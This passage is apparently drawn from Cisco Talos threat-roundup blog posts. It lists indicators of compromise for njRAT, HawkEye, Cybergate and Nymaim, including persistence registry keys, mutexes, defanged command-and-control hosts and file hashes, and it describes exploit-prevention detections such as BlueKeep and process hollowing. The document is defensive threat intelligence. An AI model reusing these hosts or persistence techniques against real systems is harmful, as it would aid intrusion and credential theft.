Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-jORer6zG5lg/XaCcnSoEUTI/AAAAAAAACxI/3K0rudeNV6sQDtXyq2dkwtlQHnkJCZMsACLcBGAsYHQ/s1600/25f1eb50680c50626387a6e2c28a9278172dadbb61113f984a9c0074db4a3514_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-HPERaTirDok/XaCcrF_0usI/AAAAAAAACxM/JboQATczhfI_PP-n_EGmQdO-X7SGysGxwCLcBGAsYHQ/s1600/25f1eb50680c50626387a6e2c28a9278172dadbb61113f984a9c0074db4a3514_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (17383) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nExcessively long PowerShell command detected \\- (3263) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nMadshi injection detected \\- (2949) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nKovter injection detected \\- (1750) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nAtom Bombing code injection technique detected \\- (577) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nProcess hollowing detected \\- (512) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (158) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nDealply adware detected \\- (149) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nInstallcore adware detected \\- (79) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nAggah malware dropper detected \\- (61) \nAggah dropper technique has been detected. The Aggah campaign has been observed dropping Azorult, LokiBot and other malware families. Aggah employs phishing and process hollowing to infect victim machines. \n \n", "modified": "2019-10-11T08:45:39", "published": "2019-10-11T08:45:39", "id": "TALOSBLOG:BC6F07233A684778F6CA4B2B7C28B45B", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nfy1VpFBlhE/threat-roundup-1004-1011.html", "type": "talosblog", "title": "Threat Roundup for October 4 to October 11", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-16T17:39:35", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 9 and Aug. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d56c3400d3b7.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Packed.njRAT-7122661-1 | Packed | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014. \nWin.Malware.HawkEye-7122916-2 | Malware | HawkEye is an information stealing malware that specifically targets usernames and passwords stored by web browsers and mail clients on an infected machine. It is commonly spread via email and can also propagate through removable media. \nWin.Malware.Cybergate-7114776-1 | Malware | Cybergate, also known as Rebhip, is a Remote Access Trojan that allows attackers to fully control the target system. Functionality includes command shell interaction, screenshot capturing, audio/video capturing, keylogging, as well as uploading/downloading files from the target system. \nWin.Malware.Nymaim-7112030-1 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads. \nWin.Malware.Tofsee-7112026-1 | Malware | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \nWin.Malware.Trickbot-7112005-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Malware.Gh0stRAT-7109635-2 | Malware | Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks. \nWin.Packed.Zeroaccess-7109532-0 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click fraud campaigns. \nWin.Trojan.Shiz-7108197-0 | Trojan | Shiz is a remote access trojan that allows an attacker to access an infected machine in order to harvest sensitive information. It is commonly spread via droppers or by visiting a malicious site. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Packed.njRAT-7122661-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\S-1-5-21-2580483871-590521980-3826313501-500 \nValue Name: di ` | 18 \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 18 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 18 \n`<HKCU>\\SOFTWARE\\91DFFF70961506A1564FE50B6195DEAD ` | 18 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 91dfff70961506a1564fe50b6195dead ` | 18 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 91dfff70961506a1564fe50b6195dead ` | 18 \n`<HKCU>\\SOFTWARE\\91DFFF70961506A1564FE50B6195DEAD \nValue Name: [kl] ` | 18 \nMutexes | Occurrences \n---|--- \n`91dfff70961506a1564fe50b6195dead` | 18 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`187[.]4[.]28[.]100` | 15 \n`189[.]10[.]170[.]195` | 3 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`aab58[.]ddns[.]net` | 18 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\91dfff70961506a1564fe50b6195dead.exe` | 18 \n`%TEMP%\\iexpress32.exe` | 18 \n \n#### File Hashes\n\n` 082411fe51dee3bbd6a97833be2f4dcaed2baac2497719384d583ecf10543032 187d82724fbe8fc09023fe8a5bb734acb8eda95cff5e7f80b2481161224539c0 4577dfba3c8f21b0d617fcf22c23e26cc09e7bdbe9b33da561632f8fb94e3e2b 4aa27fd43e7d7bc052b82dcf0b5354c4df80e53cc5a57a73a6ae54665e96f688 4ff742c0e90c295e97e2db692f30435d987ad34deaeafec1ea0772d958c1bb02 5986cbe8265a3a289e5854c5996adce4e415b966d2967b77056fb5f64a2d37ef 606ffb24b488b0d9fb5646779f2806795f836ad1af7565bf8fcc0147318e17a5 60dbc16e6c6f7b338374f48dfa19fb0946275982b021d25370cad3bbc27e303b 95ba99bc91142b433da3a42eaaeefb1ce2a7abe93f2d8816b931eaccff600192 9b7a41fc9ccb0392a9d609fcb583e3b966ed713732342822898ac6d560d569b1 9ec10adc83de49e13e491384047b11e40f2b7567991a11ab03a9703899ab55f0 b168b7b5acf2cb602aacb9c737a9a6e252461e7a4f2a4c0c1eab2fdbd36fdd7a c2d48bfb920ccc59958d456262b6313d6c1246790e1ad0270ea775665e411dac e81f03b9fcfb674248f670d60be4918781bc0c6d6b343f890c2c2fcab15d7ea0 eac06f1399c63d11fb621d348a2a8fb6256262639d239b142092fde76a684eff f0eb05bd16881de42de9a63d54164a9bc68f6f6ea1dcbf5a14a1325c018a4584 f446642655c929d6b069a874364d6da67a6d07f4a2a5f78a77087fb2f1f243aa fe84c213aa4643ba68eeca9e6af567aa809a6c0a3d2b0f9f5fa13aba4033a5de `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-pH0rrFbiEJs/XVbIbUL23gI/AAAAAAAACVM/xCKcqmwtsEwP9IubdwRmztXODaxHbiUXwCLcBGAs/s1600/95ba99bc91142b433da3a42eaaeefb1ce2a7abe93f2d8816b931eaccff600192_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IkjRJZ9jMf0/XVbIfx2_0kI/AAAAAAAACVQ/OAgbPbgJvvw-lu3AJQWR6s1zsOSa2b10wCLcBGAs/s1600/95ba99bc91142b433da3a42eaaeefb1ce2a7abe93f2d8816b931eaccff600192_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.HawkEye-7122916-2\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Update ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: Registry Key Name ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`104[.]16[.]155[.]36` | 7 \n`104[.]16[.]154[.]36` | 4 \n`93[.]158[.]134[.]38` | 2 \n`87[.]250[.]250[.]38` | 1 \n`136[.]143[.]191[.]189` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`whatismyipaddress[.]com` | 11 \n`smtp[.]yandex[.]com` | 3 \n`smtp[.]zoho[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\holdermail.txt` | 11 \n`%APPDATA%\\pid.txt` | 11 \n`%APPDATA%\\pidloc.txt` | 11 \n`%TEMP%\\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp` | 11 \n`\\Sys.exe` | 9 \n`\\autorun.inf` | 9 \n`E:\\autorun.inf` | 9 \n`E:\\Sys.exe` | 9 \n`%TEMP%\\holderwb.txt` | 8 \n`%TEMP%\\SysInfo.txt` | 8 \n`%APPDATA%\\Windows Update.exe` | 8 \n`%APPDATA%\\WindowsUpdate.exe` | 3 \n`%TEMP%\\subfolder` | 1 \n`%TEMP%\\subfolder\\filename.exe` | 1 \n`%TEMP%\\subfolder\\filename.vbs` | 1 \n \n#### File Hashes\n\n` 0360cd478f78ed02dc9cebf82d31721fbc6915b0201900cd922e59ccc32f6038 04e3d5854d00d835e206b0982889a079e3710296d33ed1ebdaf349b4bbcf790a 1c38e7e3f9a7277e60399523a664c73ad1e950de5ab59981f6ce77c908403448 49d6cfdd06d8d9a234f5e59849b47199e52a0355479563c76896edd91ca7c04e 621448e4a383b6bcba18f2b522331c6f79764db97a73d596d92308f36a2b5add 7da2b98047bf4812b37f670b7a75b1b0ccd414802a3c59e564fe0437d23964da 939b12fcce7c902fff5730a6cde141311baf0a322e9334cf1dd13230c68e7794 b23e50aa8217e033f01bfe6c52e651a3d169a202e6949a4d0d7c5a4ad145a857 d187fe363c737c1c3babe56649a39a1dc1d0da4cc7aef65e4782ba0c801e5079 d5a45f2dac9346b72a23fe10c07dc4ce234e7e577fd6c2e471464276651df1f9 e584d0e379aa3fcb0c7f9de3106ae4234d88ceca407a9645a4edcf57b9202cce `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-No-gWOW1aFo/XVbIzzGY5jI/AAAAAAAACVc/NC_Wd08Ugp4BIPusHwoSCv2euCNDFrAOgCLcBGAs/s1600/621448e4a383b6bcba18f2b522331c6f79764db97a73d596d92308f36a2b5add_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-99K4uGT2iKI/XVbI3pyc_NI/AAAAAAAACVg/ueeZd27yxjMeLJrcVLJXLTI2ikYClMrmQCLcBGAs/s1600/621448e4a383b6bcba18f2b522331c6f79764db97a73d596d92308f36a2b5add_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Cybergate-7114776-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: MSQM ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: MSQM ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Realtek Audio ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Adobe Starter ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{0H0N0B4G-P8H0-63SU-QBB1-QXKN5M1261DQ} ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{0H0N0B4G-P8H0-63SU-QBB1-QXKN5M1261DQ} \nValue Name: StubPath ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{1C7T55HW-D326-IWQK-6087-652774G5V2RN} ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{1C7T55HW-D326-IWQK-6087-652774G5V2RN} \nValue Name: StubPath ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{0KWTNM33-D745-1P14-D1BA-224TD37L2DP8} ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{86TIP765-B0E5-AB86-L87O-3R28QFSJGN0J} ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: Policies ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: Policies ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Audio ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Audio ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{0KWTNM33-D745-1P14-D1BA-224TD37L2DP8} \nValue Name: StubPath ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{86TIP765-B0E5-AB86-L87O-3R28QFSJGN0J} \nValue Name: StubPath ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{6W6SH85E-GESR-7C8G-187D-4M6664523332} ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{6W6SH85E-GESR-7C8G-187D-4M6664523332} \nValue Name: StubPath ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{G718OU16-FJJG-TVIB-LQ35-WINSRC80H3GD} ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{G718OU16-FJJG-TVIB-LQ35-WINSRC80H3GD} \nValue Name: StubPath ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{41LU5C5I-NQ05-2KS6-7E2G-P3AD1GREFY8T} ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{41LU5C5I-NQ05-2KS6-7E2G-P3AD1GREFY8T} \nValue Name: StubPath ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{216555Q4-64KR-BMG3-55K7-2354V88S0LSE} ` | 1 \nMutexes | Occurrences \n---|--- \n`_x_X_BLOCKMOUSE_X_x_` | 13 \n`_x_X_PASSWORDLIST_X_x_` | 13 \n`_x_X_UPDATE_X_x_` | 13 \n`Pluguin` | 12 \n`Pluguin_PERSIST` | 12 \n`Pluguin_SAIR` | 12 \n`***MUTEX***` | 1 \n`***MUTEX***_PERSIST` | 1 \n`***MUTEX***_SAIR` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`187[.]58[.]232[.]18` | 12 \n`52[.]8[.]126[.]80` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`rainoide[.]no-ip[.]org` | 12 \n`www[.]server[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\XX--XX--XX.txt` | 13 \n`%TEMP%\\UuU.uUu` | 13 \n`%TEMP%\\XxX.xXx` | 13 \n`%APPDATA%\\logs.dat` | 13 \n`%SystemRoot%\\SysWOW64\\Microsoft` | 13 \n`%SystemRoot%\\SysWOW64\\Microsoft\\svchost.exe` | 12 \n`%SystemRoot%\\SysWOW64\\Microsoft\\svchost` | 1 \n \n#### File Hashes\n\n` 19f9ab1a6f01c5bb060fd865f165d48789f6b6c561960071823b6fcfbddc733b 40fc7ace7357cb61cb7ad47e655d7d33c0952cbea1fae151f969eca85deea68d 6b185c176128cf98a5241c3d10d0486cb3b4c3a8877d7831beed7088b688ee93 889728767005bed83d50f8ac92d4f8685be74f71155537c011dbdfb5da861b26 949809f505011d5b9aacc19fde3bead211004bce92921a460afe8e8f57b92923 ad8f56bddd8a0cae565c243ff0e4422781f78cc3033763d2a9100e32c2ffe98c b3b914069bb60dab4a0679f912c43f77a3c4bf71804fcbd5085646336dc41908 b3ded4b6a12a5a232816b33546167fa3e90eb78ac2876d1c6b4adaad4b75abc1 c5d0479add616c17dfdef957dc106522ff40bebd08ab070b0941474715a29dfb c7f2645df614351360457a892f9849df80155330e10449d4448d357c3d717ceb dc416c86df2bad0adde036bda83db1fbcac13036a2ea7f73453597e7a3d5788c ee13ecb06987aeef5bef6de64e0e5439b44f07f9f0783d8cdb6ace3fa950a6a1 f2a2dc50a052bc4a25cc8fcdd235d89286fec24beede6f6cb78b7641162bec0e `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-LkooKXXCB3k/XVbJL1GjSKI/AAAAAAAACVs/P3ioLttedk01O8GSTXN3F3Ez68VQxxtUwCLcBGAs/s1600/c5d0479add616c17dfdef957dc106522ff40bebd08ab070b0941474715a29dfb_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-Hmrw5DUbKFE/XVbJRY0zfSI/AAAAAAAACV0/KLxMMgAw2s0khNXr654LP6Py10ftXkpPgCLcBGAs/s1600/b3b914069bb60dab4a0679f912c43f77a3c4bf71804fcbd5085646336dc41908_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Nymaim-7112030-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK \nValue Name: mbijg ` | 25 \nMutexes | Occurrences \n---|--- \n`Local\\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 25 \n`Local\\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 25 \n`Local\\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 25 \n`Local\\{F6F578C7-92FE-B7B1-40CF-049F3710A368}` | 25 \n`Local\\{306BA354-8414-ABA3-77E9-7A7F347C71F4}` | 25 \n`Local\\{F58B5142-BC49-9662-B172-EA3D10CAA47A}` | 25 \n`Local\\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}` | 25 \n`Local\\{B888AC68-15DA-9362-2153-60CCDE3753D5}` | 25 \n`Local\\{2DB629D3-9CAA-6933-9C2E-D40B0ACCAC9E}` | 25 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`grkokxuhgk[.]net` | 24 \n`utjawtkqtw[.]com` | 24 \n`glgythylattw[.]in` | 24 \n`xdqhf[.]com` | 24 \n`kcrrrqnoan[.]com` | 24 \n`bweyobzofdy[.]com` | 24 \n`xukgvscceju[.]in` | 24 \n`luewnrtwhigf[.]in` | 24 \n`zwhgvnfdb[.]com` | 24 \n`bxsfawcpsgwl[.]com` | 24 \n`hwhskkbdlc[.]in` | 24 \n`uxwauildd[.]pw` | 24 \n`cogkyi[.]com` | 24 \n`tqsxnfi[.]net` | 24 \n`jvelkgcftqy[.]pw` | 24 \n`uihmdwnvp[.]com` | 1 \n`wnucbhflcr[.]in` | 1 \n`bpgfuc[.]in` | 1 \n`zrhqhmghjx[.]com` | 1 \n`sdwnmtsxtjcf[.]pw` | 1 \n`rfvztqxsfiz[.]net` | 1 \n`cofuvrdr[.]in` | 1 \n`kdhlszxotsd[.]in` | 1 \n`arnkxqhjjs[.]in` | 1 \n`fanshg[.]in` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\ph` | 25 \n`%ProgramData%\\ph\\fktiipx.ftf` | 25 \n`%TEMP%\\gocf.ksv` | 25 \n`%ProgramData%\\<random, matching '[a-z0-9]{3,7}'>` | 25 \n`%APPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 25 \n`%LOCALAPPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 25 \n`%TEMP%\\fro.dfx` | 23 \n`\\Documents and Settings\\All Users\\pxs\\pil.ohu` | 23 \n`%TEMP%\\bpnb.skg` | 4 \n \n#### File Hashes\n\n` 01fbd952fe57f673aea818e12a0aa675c9e29e1ba0f85d28645a926f3df4f7f4 028423fc9b5fb8f3fc0f985e43b703ce05e69a3828f7152dda5d6e6bc3175da7 05263f754c5456ad772dd2448b85e9fefd1c4204f12391d8068bcba7cc388c53 0b51bc5550062212ed1ac0a7099235e2fd0296b93446106b0220fab519fd634e 143c9de178660a194d5e22ba45bd7d1d56d3f286eb16ff9a1206cbbecaf811a1 2dbd752e0cb2b3b1d20fa8e714281b8856fc121b4a2670937f7956f90dfe9ecd 3180f041ff1ccd52f829f222e5d124935a11bc3aa9fc908e3ce93f84e1ec49dc 3f88dae29802bbbd85c175ce34b40b4bf34f884768b6669a91981f374bd1cd1f 441649516eb75a61f2ca4d0570dd2e201c6528b452ce7bc04c5120a5b36ee090 485e521ef0299ede43da514cdf8992bddc95529209889e562d0cab884bf71cdd 54875c46bc6795dd22af5760a5452f3814a5b6827ed996d6a475ec95b9107626 645c58460c7d1b0ef4769d505492eb5a9bba5efadf9f6a456313df72bf706eda 6802f2b005b9e02f395117ce2f753d98d239d9271825871105cca11f86764ada 8519328e272602bc7117a7c9da2c00e40e8d45a97528ed3fa7c86f2fdeb9b679 862346823cef73fdd9a155b84edb2feb180a61390a3817ef97fa272cb01d7994 95556cf5e5a160d2940014413d4948bc4877a127ce142bf27a7295ca212e48ae 991bd9883c36b2fdf326418d6ec660c6a5d57e88f2355a49a5c69b2490c848b3 9d30abaa088f71f0914d083a8c6232e37e1fb13bdb495c6d3b1485b50f764e42 b0eb5e5599605584271a1513740039d6cfc363d7203e8654d9ece9d7df1b06a2 bc11794224c3dba73fefc8be9bea7ddc8782db3e3173467a1726e02588e56019 c3120a24f20ecedf04b17c71bc7f1588d1daa776ea66b1b85f713ffe7136c944 c9017faf332ab5c93fadda86db30d7e6b6a67afd6aa0cf1334b1744e16497b69 d0f6e3867416053747e82117e4cf5b5dd1a0f573316ddf6d1716465726bbb215 e1797282c01e2bcf9e03707136cfc60bfdee5818cb1ec59984befd55de4c6719 eae1547bca1f3c4425f9ea295ee6cebef5a6815ed6348107cb23cccbfd8fb1e0 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-TCdoY-FfZd0/XVbK9iMxXNI/AAAAAAAACWE/RJqcAlpU3DwPknqOF5mc4AKMmRG0iUJJwCLcBGAs/s1600/e1797282c01e2bcf9e03707136cfc60bfdee5818cb1ec59984befd55de4c6719_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-S8jyzEW01O8/XVbLBqze8EI/AAAAAAAACWI/O89cdi7f3HchJ3DdboCaq75F0TyENHERgCLcBGAs/s1600/e1797282c01e2bcf9e03707136cfc60bfdee5818cb1ec59984befd55de4c6719_tg.png>)\n\n \n\n\n#### 